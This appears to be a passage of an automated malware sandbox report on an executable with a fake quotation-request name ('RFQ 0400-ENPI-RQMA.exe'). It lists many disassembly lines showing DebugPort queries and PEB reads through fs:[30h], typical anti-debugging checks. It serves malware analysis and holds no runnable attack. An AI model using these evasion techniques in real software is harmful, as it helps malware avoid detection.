            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\replace.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_00417673 LdrLoadDll, 2_2_00417673
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01454144 mov eax, dword ptr fs:[00000030h] 2_2_01454144
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01454144 mov ecx, dword ptr fs:[00000030h] 2_2_01454144
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01453140 mov eax, dword ptr fs:[00000030h] 2_2_01453140
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013C1131 mov eax, dword ptr fs:[00000030h] 2_2_013C1131
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013BB136 mov eax, dword ptr fs:[00000030h] 2_2_013BB136
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01495152 mov eax, dword ptr fs:[00000030h] 2_2_01495152
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013F0124 mov eax, dword ptr fs:[00000030h] 2_2_013F0124
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01458158 mov eax, dword ptr fs:[00000030h] 2_2_01458158
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01459179 mov eax, dword ptr fs:[00000030h] 2_2_01459179
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013BF172 mov eax, dword ptr fs:[00000030h] 2_2_013BF172
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01480115 mov eax, dword ptr fs:[00000030h] 2_2_01480115
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0146A118 mov ecx, dword ptr fs:[00000030h] 2_2_0146A118
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0146A118 mov eax, dword ptr fs:[00000030h] 2_2_0146A118
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013C6154 mov eax, dword ptr fs:[00000030h] 2_2_013C6154
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013BC156 mov eax, dword ptr fs:[00000030h] 2_2_013BC156
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013C7152 mov eax, dword ptr fs:[00000030h] 2_2_013C7152
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013B9148 mov eax, dword ptr fs:[00000030h] 2_2_013B9148
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_014951CB mov eax, dword ptr fs:[00000030h] 2_2_014951CB
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_014861C3 mov eax, dword ptr fs:[00000030h] 2_2_014861C3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013DB1B0 mov eax, dword ptr fs:[00000030h] 2_2_013DB1B0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0143E1D0 mov eax, dword ptr fs:[00000030h] 2_2_0143E1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0143E1D0 mov ecx, dword ptr fs:[00000030h] 2_2_0143E1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013BA197 mov eax, dword ptr fs:[00000030h] 2_2_013BA197
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_014961E5 mov eax, dword ptr fs:[00000030h] 2_2_014961E5
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_014671F9 mov esi, dword ptr fs:[00000030h] 2_2_014671F9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01400185 mov eax, dword ptr fs:[00000030h] 2_2_01400185
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013F01F8 mov eax, dword ptr fs:[00000030h] 2_2_013F01F8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0147C188 mov eax, dword ptr fs:[00000030h] 2_2_0147C188
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013E51EF mov eax, dword ptr fs:[00000030h] 2_2_013E51EF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013C51ED mov eax, dword ptr fs:[00000030h] 2_2_013C51ED
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01417190 mov eax, dword ptr fs:[00000030h] 2_2_01417190
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0144019F mov eax, dword ptr fs:[00000030h] 2_2_0144019F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_014711A4 mov eax, dword ptr fs:[00000030h] 2_2_014711A4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013FD1D0 mov eax, dword ptr fs:[00000030h] 2_2_013FD1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013FD1D0 mov ecx, dword ptr fs:[00000030h] 2_2_013FD1D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01446050 mov eax, dword ptr fs:[00000030h] 2_2_01446050
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0146705E mov ebx, dword ptr fs:[00000030h] 2_2_0146705E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0146705E mov eax, dword ptr fs:[00000030h] 2_2_0146705E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013BA020 mov eax, dword ptr fs:[00000030h] 2_2_013BA020
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013BC020 mov eax, dword ptr fs:[00000030h] 2_2_013BC020
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_01495060 mov eax, dword ptr fs:[00000030h] 2_2_01495060
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_0144106E mov eax, dword ptr fs:[00000030h] 2_2_0144106E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exe Code function: 2_2_013DE016 mov eax, dword ptr fs:[00000030h] 2_2_013DE016
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE016 mov eax, dword ptr fs:[00000030h]2_2_013DE016
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE016 mov eax, dword ptr fs:[00000030h]2_2_013DE016
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D070 mov ecx, dword ptr fs:[00000030h]2_2_0143D070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01444000 mov ecx, dword ptr fs:[00000030h]2_2_01444000
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov ecx, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D1070 mov eax, dword ptr fs:[00000030h]2_2_013D1070
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EC073 mov eax, dword ptr fs:[00000030h]2_2_013EC073
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C2050 mov eax, dword ptr fs:[00000030h]2_2_013C2050
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EB052 mov eax, dword ptr fs:[00000030h]2_2_013EB052
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01456030 mov eax, dword ptr fs:[00000030h]2_2_01456030
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148903E mov eax, dword ptr fs:[00000030h]2_2_0148903E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148903E mov eax, dword ptr fs:[00000030h]2_2_0148903E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148903E mov eax, dword ptr fs:[00000030h]2_2_0148903E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148903E mov eax, dword ptr fs:[00000030h]2_2_0148903E
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D0C0 mov eax, dword ptr fs:[00000030h]2_2_0143D0C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0143D0C0 mov eax, dword ptr fs:[00000030h]2_2_0143D0C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014950D9 mov eax, dword ptr fs:[00000030h]2_2_014950D9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014420DE mov eax, dword ptr fs:[00000030h]2_2_014420DE
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F909C mov eax, dword ptr fs:[00000030h]2_2_013F909C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014460E0 mov eax, dword ptr fs:[00000030h]2_2_014460E0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C5096 mov eax, dword ptr fs:[00000030h]2_2_013C5096
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013ED090 mov eax, dword ptr fs:[00000030h]2_2_013ED090
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013ED090 mov eax, dword ptr fs:[00000030h]2_2_013ED090
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014020F0 mov ecx, dword ptr fs:[00000030h]2_2_014020F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C208A mov eax, dword ptr fs:[00000030h]2_2_013C208A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BD08D mov eax, dword ptr fs:[00000030h]2_2_013BD08D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144D080 mov eax, dword ptr fs:[00000030h]2_2_0144D080
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144D080 mov eax, dword ptr fs:[00000030h]2_2_0144D080
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BC0F0 mov eax, dword ptr fs:[00000030h]2_2_013BC0F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C80E9 mov eax, dword ptr fs:[00000030h]2_2_013C80E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BA0E3 mov ecx, dword ptr fs:[00000030h]2_2_013BA0E3
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E50E4 mov eax, dword ptr fs:[00000030h]2_2_013E50E4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E50E4 mov ecx, dword ptr fs:[00000030h]2_2_013E50E4
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E90DB mov eax, dword ptr fs:[00000030h]2_2_013E90DB
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014580A8 mov eax, dword ptr fs:[00000030h]2_2_014580A8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014860B8 mov eax, dword ptr fs:[00000030h]2_2_014860B8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014860B8 mov ecx, dword ptr fs:[00000030h]2_2_014860B8
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov ecx, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov ecx, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov ecx, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov ecx, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D70C0 mov eax, dword ptr fs:[00000030h]2_2_013D70C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01495341 mov eax, dword ptr fs:[00000030h]2_2_01495341
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B7330 mov eax, dword ptr fs:[00000030h]2_2_013B7330
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_01442349 mov eax, dword ptr fs:[00000030h]2_2_01442349
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013EF32A mov eax, dword ptr fs:[00000030h]2_2_013EF32A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov ecx, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144035C mov eax, dword ptr fs:[00000030h]2_2_0144035C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148A352 mov eax, dword ptr fs:[00000030h]2_2_0148A352
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147F367 mov eax, dword ptr fs:[00000030h]2_2_0147F367
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BC310 mov ecx, dword ptr fs:[00000030h]2_2_013BC310
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E0310 mov ecx, dword ptr fs:[00000030h]2_2_013E0310
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FA30B mov eax, dword ptr fs:[00000030h]2_2_013FA30B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FA30B mov eax, dword ptr fs:[00000030h]2_2_013FA30B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013FA30B mov eax, dword ptr fs:[00000030h]2_2_013FA30B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0146437C mov eax, dword ptr fs:[00000030h]2_2_0146437C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C7370 mov eax, dword ptr fs:[00000030h]2_2_013C7370
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C7370 mov eax, dword ptr fs:[00000030h]2_2_013C7370
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013C7370 mov eax, dword ptr fs:[00000030h]2_2_013C7370
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144930B mov eax, dword ptr fs:[00000030h]2_2_0144930B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144930B mov eax, dword ptr fs:[00000030h]2_2_0144930B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0144930B mov eax, dword ptr fs:[00000030h]2_2_0144930B
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148132D mov eax, dword ptr fs:[00000030h]2_2_0148132D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0148132D mov eax, dword ptr fs:[00000030h]2_2_0148132D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9353 mov eax, dword ptr fs:[00000030h]2_2_013B9353
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B9353 mov eax, dword ptr fs:[00000030h]2_2_013B9353
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BD34C mov eax, dword ptr fs:[00000030h]2_2_013BD34C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BD34C mov eax, dword ptr fs:[00000030h]2_2_013BD34C
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014463C0 mov eax, dword ptr fs:[00000030h]2_2_014463C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147C3CD mov eax, dword ptr fs:[00000030h]2_2_0147C3CD
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147B3D0 mov ecx, dword ptr fs:[00000030h]2_2_0147B3D0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E33A5 mov eax, dword ptr fs:[00000030h]2_2_013E33A5
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F33A0 mov eax, dword ptr fs:[00000030h]2_2_013F33A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F33A0 mov eax, dword ptr fs:[00000030h]2_2_013F33A0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0147F3E6 mov eax, dword ptr fs:[00000030h]2_2_0147F3E6
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B8397 mov eax, dword ptr fs:[00000030h]2_2_013B8397
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B8397 mov eax, dword ptr fs:[00000030h]2_2_013B8397
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013B8397 mov eax, dword ptr fs:[00000030h]2_2_013B8397
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E438F mov eax, dword ptr fs:[00000030h]2_2_013E438F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013E438F mov eax, dword ptr fs:[00000030h]2_2_013E438F
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BE388 mov eax, dword ptr fs:[00000030h]2_2_013BE388
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BE388 mov eax, dword ptr fs:[00000030h]2_2_013BE388
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013BE388 mov eax, dword ptr fs:[00000030h]2_2_013BE388
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_014953FC mov eax, dword ptr fs:[00000030h]2_2_014953FC
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013F63FF mov eax, dword ptr fs:[00000030h]2_2_013F63FF
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE3F0 mov eax, dword ptr fs:[00000030h]2_2_013DE3F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE3F0 mov eax, dword ptr fs:[00000030h]2_2_013DE3F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013DE3F0 mov eax, dword ptr fs:[00000030h]2_2_013DE3F0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0149539D mov eax, dword ptr fs:[00000030h]2_2_0149539D
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013D03E9 mov eax, dword ptr fs:[00000030h]2_2_013D03E9
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0141739A mov eax, dword ptr fs:[00000030h]2_2_0141739A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_0141739A mov eax, dword ptr fs:[00000030h]2_2_0141739A
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
            Source: C:\Users\user\Desktop\RFQ 0400-ENPI-RQMA.exeCode function: 2_2_013CA3C0 mov eax, dword ptr fs:[00000030h]2_2_013CA3C0
